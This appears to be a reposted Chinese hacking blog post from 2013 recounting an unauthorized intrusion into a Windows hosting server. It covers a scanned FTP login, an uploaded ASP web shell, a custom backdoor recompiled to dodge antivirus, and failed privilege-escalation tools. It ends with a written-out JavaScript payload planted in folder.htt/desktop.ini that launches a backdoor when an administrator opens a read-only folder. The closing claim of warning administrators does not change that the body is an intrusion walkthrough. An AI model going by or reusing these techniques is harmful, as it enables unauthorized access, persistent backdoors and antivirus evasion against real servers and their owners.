你的分享就是我们的动力 ---﹥

一次获得管理员权限的艰难经历

时间:2013-03-13 12:47来源:www.chengxuyuans.com 点击:

在一次描扫中,隅然得到了一个FTP的用户和密码,进去一看,有很多网页文件。估计是一个虚拟主机用户。即然已经得到一个用户了,就想进去看看主机里到底有点什么东西(人的好奇心就是重)。先把它的主页index.asp下载下来打开,在里面找到了这个虚拟用户的域名(www.xxxx.com)。然后上传了个海阳顶端ASP木马程序(这个ASP木马不错,功能很多)上去,用www.xxxx.com/xp.asp试了一下,哈哈!能用,看来管理员的水平不怎么样,没有对wscript.shell、shell.application等危险的角本对象作限制,拿它的admin看来有希望了。
虽然已经有一个shell,但是这个shell是web的,实在是不好用,所以我们首先要得到一个DOS下的shell。于是传了个winshell后门上去,但是一运行文件就不见了,看来是被杀毒软件给杀掉了,看来流行的后门是不能用了。现成的不能用,那我们就自己编吧,打开我的C++,调出了很久前自己写的一个后门,功能很简单就只是绑定一个cmd到指定的端口(不过已经足够用了),编好后,上传、运行,一切OK,成功连接!其实杀毒软件也只能难为那些只懂用点现成工具的“小黑客”们。对于那些懂编程的黑客高手(别误会,我不是高手只是懂一点点编程而已。)来说是没有用的,只要随便改一下源代码,编译后,杀毒软件就跟本查不出来了。亲爱的“小黑客”们努力学习编程吧。
现在我们终于得到了一个DOS下的shell(还真不容易),这下就方便多了。但是现在我们只有guest权限。我们的目标是拿到admin。所以接下来的工作是提升我们的权限。传了一个ErunAsX.exe上去,晕!一传上去就不见了,看来又是被杀掉了。换一个吧,ptsec.exe这个应该不会被杀。上传成功,没有被杀。在命令行输入:
C:\>ptsec.exe /di
提示提升权限失败。
晕~~晕~~晕~~~!可能是打了SP3或是SP4了。接下来又试了好几个提升权限的工具,不是被杀,就是提升失败。看来用提升权限工具是不行了。(也许是我水平菜,朋友们有什么提升权限的好工具,请告诉我。QQ:13865333)
虽然受挫,我们也不能这样就放弃了。要想做黑客就要得有点百折不饶、不达目的势不罢修的精神,东方不亮,西方亮,我们再想其它方法看看。
放一个后门进 “C:\Documents and Settings\Administrator\「开始」菜单\程序\启动”试试看,如果可以的话,等管理员重起服务器,后门就可以以管理的身份运行了。
妈的!不行,拒绝访问!这黑客还真是难做!
修改注册表试试看,以guest方式,用regedit /s filename.reg 在本机试了一下,还是不行,虽然guest是可以修改注册的,但是它挂在注册表run项中的程序,下次启动还是以guest启动的,而且还要以guest 登录才行。
难道就真的黩妒技穷了,在这“走投不路”之时,我突然起了,前段时间有个朋友跟我说过可以用desktop.ini和folder.htt来启动程序,这个方法应该可行(新欢乐时光病毒就是用的这种方式)。不管怎样只要有一线希望,我们就要试一下。
desktop.ini和folder.htt这两个文件是windows系统目录(web显示方式)的配置文件,几乎在每个目录里都有,但是一般情况下是隐藏看不见的,要让它们可见必须修改目录菜单,“工具->文件夹选项->查看”中的内容。如图:

把“隐藏受保护的操作系统文件(推荐)”这一项上的“勾”去掉。
下面我们把c:\winnt目录中的desktop.ini 和folder.htt(注意:每种不同目录下的desktop.ini和folder.htt文件都是不同的,所以一定要是winnt目录下的。)复制出来,用记事本打开folder.htt文件把下面的代码加在最前面:
<script language="javascript">
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"后门名.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>
把其中的“后门名.exe”改为你想要启动的后门名称。
现在我们只要把desktop.ini、folder.htt和后门程序,放在同一个只读目录(记住一定要是只读目录,而且最好是管理员经常进去的)下,当管理员打开这个目录,后门程序就会自动得到运行。所以,在此提醒管理员们不要随便打开目录,如果要打开,先看一下目录的属性,不要设置只读属性的目录(其实windows系统下的只读目录没什么用处,以guest身份就可以对它进行读写),还有就是要用“使用windows传统风格的文件夹”的方式来浏览目录。如下图:


接下来的问题是如何找到一个只读目录呢?方法很简单,只要在命令行打入:
D:\>dir /ar
2002-04-01 15:28 <DIR> wwwok
0 个文件 0 字节
1 个目录 1,488,887,808 可用字节
D:\>
只读目录就会列出来了。
运气不错,找到了一个叫wwwok的只读目录,而且这个还是虚拟用户的总目录,管理员一定会经常来的。
我把desktop.ini、folder.ini和一个很好的后门(以服务启动,不会被杀的)放了进去。
皇天不负有心人,两天之后,我的后门程序终于得到了执行,成功的拿到了管理员权限。
以上是本人一次成功拿到管理员权限的艰难经历(高手可能早就搞定了),希望对大家有所启发,其主要目的不是教大家如何入侵,只是希望有以上问题的管理员引以为戒,把网络安全做得更好!因为本人水平有限,不当之处还请高手们指正

转载注明地址:http://www.chengxuyuans.com/hacker/instance/52632.html